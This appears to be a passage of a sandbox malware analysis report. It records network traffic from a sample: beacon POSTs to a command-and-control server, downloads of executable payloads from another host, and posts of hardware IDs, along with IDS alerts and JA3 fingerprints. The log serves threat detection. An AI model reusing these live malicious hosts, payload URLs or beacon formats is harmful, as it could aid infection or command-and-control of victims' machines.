Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 34 35 33 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1004537001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 31 32 42 37 35 42 33 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B12B75B35F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 34 35 35 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1004550001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 34 35 35 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1004551001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16If-Modified-Since: Thu, 07 Nov 2024 05:56:13 GMTIf-None-Match: "672c567d-200000"
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 34 35 35 32 30 33 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1004552031&unit=246122658369
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFCFHJDBKJKEBFHJEHIIHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 46 43 46 48 4a 44 42 4b 4a 4b 45 42 46 48 4a 45 48 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 35 44 42 42 44 39 43 30 34 36 33 37 34 38 31 34 30 37 33 31 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 46 48 4a 44 42 4b 4a 4b 45 42 46 48 4a 45 48 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 46 48 4a 44 42 4b 4a 4b 45 42 46 48 4a 45 48 49 49 2d 2d 0d 0a Data Ascii: ------CFCFHJDBKJKEBFHJEHIIContent-Disposition: form-data; name="hwid"25DBBD9C0463748140731------CFCFHJDBKJKEBFHJEHIIContent-Disposition: form-data; name="build"tale------CFCFHJDBKJKEBFHJEHII--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 34 35 35 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1004553001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 31 32 42 37 35 42 33 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B12B75B35F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 31 32 42 37 35 42 33 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B12B75B35F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 31 32 42 37 35 42 33 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B12B75B35F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCFBAKJDBKJJKFIDBGHCHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 43 46 42 41 4b 4a 44 42 4b 4a 4a 4b 46 49 44 42 47 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 35 44 42 42 44 39 43 30 34 36 33 37 34 38 31 34 30 37 33 31 0d 0a 2d 2d 2d 2d 2d 2d 46 43 46 42 41 4b 4a 44 42 4b 4a 4a 4b 46 49 44 42 47 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 46 43 46 42 41 4b 4a 44 42 4b 4a 4a 4b 46 49 44 42 47 48 43 2d 2d 0d 0a Data Ascii: ------FCFBAKJDBKJJKFIDBGHCContent-Disposition: form-data; name="hwid"25DBBD9C0463748140731------FCFBAKJDBKJJKFIDBGHCContent-Disposition: form-data; name="build"tale------FCFBAKJDBKJJKFIDBGHC--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKKKFBGDHJKFHJJJJDGCHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 4b 4b 46 42 47 44 48 4a 4b 46 48 4a 4a 4a 4a 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 35 44 42 42 44 39 43 30 34 36 33 37 34 38 31 34 30 37 33 31 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 4b 46 42 47 44 48 4a 4b 46 48 4a 4a 4a 4a 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 4b 46 42 47 44 48 4a 4b 46 48 4a 4a 4a 4a 44 47 43 2d 2d 0d 0a Data Ascii: ------AKKKFBGDHJKFHJJJJDGCContent-Disposition: form-data; name="hwid"25DBBD9C0463748140731------AKKKFBGDHJKFHJJJJDGCContent-Disposition: form-data; name="build"tale------AKKKFBGDHJKFHJJJJDGC--

Source: Joe Sandbox View	IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View	IP Address: 172.67.133.135 172.67.133.135

Source: Joe Sandbox View

ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

Source: Joe Sandbox View	JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49794 -> 172.67.195.247:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49882 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49934 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50012 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50024 -> 172.67.133.135:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50052 -> 172.67.133.135:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50115 -> 172.67.133.135:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50108 -> 172.67.133.135:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50111 -> 172.67.133.135:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50114 -> 172.67.133.135:443
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.4:49736
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.4:49730

Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45

Source: C:\Users\user\Desktop\lIocM276SA.exe

Code function: 0_2_002DE0C0 recv,recv,recv,recv,

0_2_002DE0C0

Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=ZZPMoS3BkMFh9ST&MD=68AFPEt1 HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=ZZPMoS3BkMFh9ST&MD=68AFPEt1 HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
